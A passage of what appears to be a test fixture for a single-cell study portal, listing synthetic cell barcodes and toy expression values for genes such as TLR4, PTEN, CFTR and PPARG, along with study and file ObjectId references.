"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR4 Expression": {
"name": "TLR4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.58,
1.0,
2.0,
2.58,
2.58,
2.32,
2.58,
1.0,
3.0,
2.0,
2.58,
3.0,
2.0,
2.32,
2.32,
2.58,
2.81,
1.0,
1.0,
2.32,
1.58,
2.58,
2.32,
2.58,
2.0,
2.58,
2.81,
2.32,
2.32,
1.58,
3.0,
2.0,
2.81,
2.32,
2.32,
2.0,
1.58,
1.0,
3.0,
2.32,
2.81,
2.32,
2.0,
2.81,
3.0,
1.0,
2.32,
3.0,
1.58,
1.58,
2.32,
2.58,
2.32,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTNNB1 Cells": {
"name": "CTNNB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTNNB1 Expression": {
"name": "CTNNB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
2.32,
2.32,
2.58,
2.0,
2.58,
1.0,
1.58,
2.32,
2.0,
1.58,
1.0,
2.32,
3.0,
2.58,
2.58,
2.0,
2.32,
2.58,
2.81,
1.0,
2.81,
2.32,
2.58,
2.81,
1.58,
2.32,
2.58,
2.58,
2.81,
2.0,
2.58,
2.58,
2.58,
2.32,
2.0,
2.58,
2.32,
1.58,
3.0,
2.32,
2.58,
2.81,
1.0,
2.0,
1.58,
2.81,
2.32,
2.0,
2.81,
1.0,
2.32,
3.0,
2.0,
1.0,
1.0,
2.32,
2.58,
2.81,
2.58,
2.81,
2.58,
3.0,
1.58,
2.58,
2.81,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTEN Cells": {
"name": "PTEN Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTEN Expression": {
"name": "PTEN Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
3.0,
1.0,
2.32,
2.81,
3.0,
1.58,
2.32,
1.58,
2.81,
2.58,
2.0,
1.58,
1.58,
1.58,
1.58,
2.58,
2.0,
1.58,
2.0,
2.32,
1.58,
3.0,
3.0,
3.0,
2.81,
2.0,
2.0,
2.58,
2.58,
2.58,
2.81,
2.81,
2.81,
2.0,
2.0,
2.32,
2.0,
2.0,
1.58,
3.0,
2.32,
2.0,
1.0,
1.58,
1.58,
1.58,
3.0,
2.32,
2.81,
3.0,
1.0,
3.0,
1.0,
2.81,
1.0,
2.58,
2.0,
2.58,
1.0,
2.0,
2.0,
2.32,
1.0,
1.58,
2.81,
3.0,
2.32,
2.32,
1.0,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCL8 Cells": {
"name": "CXCL8 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCL8 Expression": {
"name": "CXCL8 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.32,
2.58,
1.0,
3.0,
1.58,
1.0,
2.81,
1.0,
2.32,
2.0,
1.58,
1.0,
1.58,
2.81,
2.0,
1.58,
1.58,
2.58,
1.0,
3.0,
3.0,
2.0,
2.0,
3.0,
2.0,
2.32,
2.81,
1.58,
1.0,
2.0,
3.0,
2.58,
3.0,
2.32,
2.58,
2.58,
2.32,
1.58,
2.0,
2.32,
1.0,
3.0,
1.0,
2.0,
2.32,
2.58,
2.0,
1.0,
2.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CFTR Cells": {
"name": "CFTR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CFTR Expression": {
"name": "CFTR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.0,
2.58,
2.32,
2.81,
3.0,
2.58,
1.0,
2.81,
2.32,
2.32,
3.0,
2.58,
1.58,
3.0,
3.0,
2.81,
2.58,
2.81,
3.0,
1.0,
3.0,
2.0,
1.58,
2.32,
2.58,
2.0,
1.0,
1.0,
1.0,
2.58,
2.58,
1.58,
1.58,
1.0,
1.58,
2.0,
2.58,
2.32,
1.0,
2.81,
2.32,
2.58,
1.0,
1.58,
2.81,
1.58,
2.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PPARG Cells": {
"name": "PPARG Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PPARG Expression": {
"name": "PPARG Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.81,
2.81,
1.58,
2.0,
2.81,
2.0,
2.0,
1.0,
2.58,
1.58,
2.0,
2.32,
2.81,
3.0,
1.58,
2.0,
3.0,
3.0,
2.32,
2.81,
2.81,
1.58,
2.0,
1.58,
3.0,
1.0,
1.0,
1.0,
2.58,
1.58,
2.81,
3.0,
2.58,
1.0,
2.32,
2.81,
2.81,
3.0,
1.58,
1.58,
2.58,
2.81,
2.32,
1.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SLC6A4 Cells": {
"name": "SLC6A4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
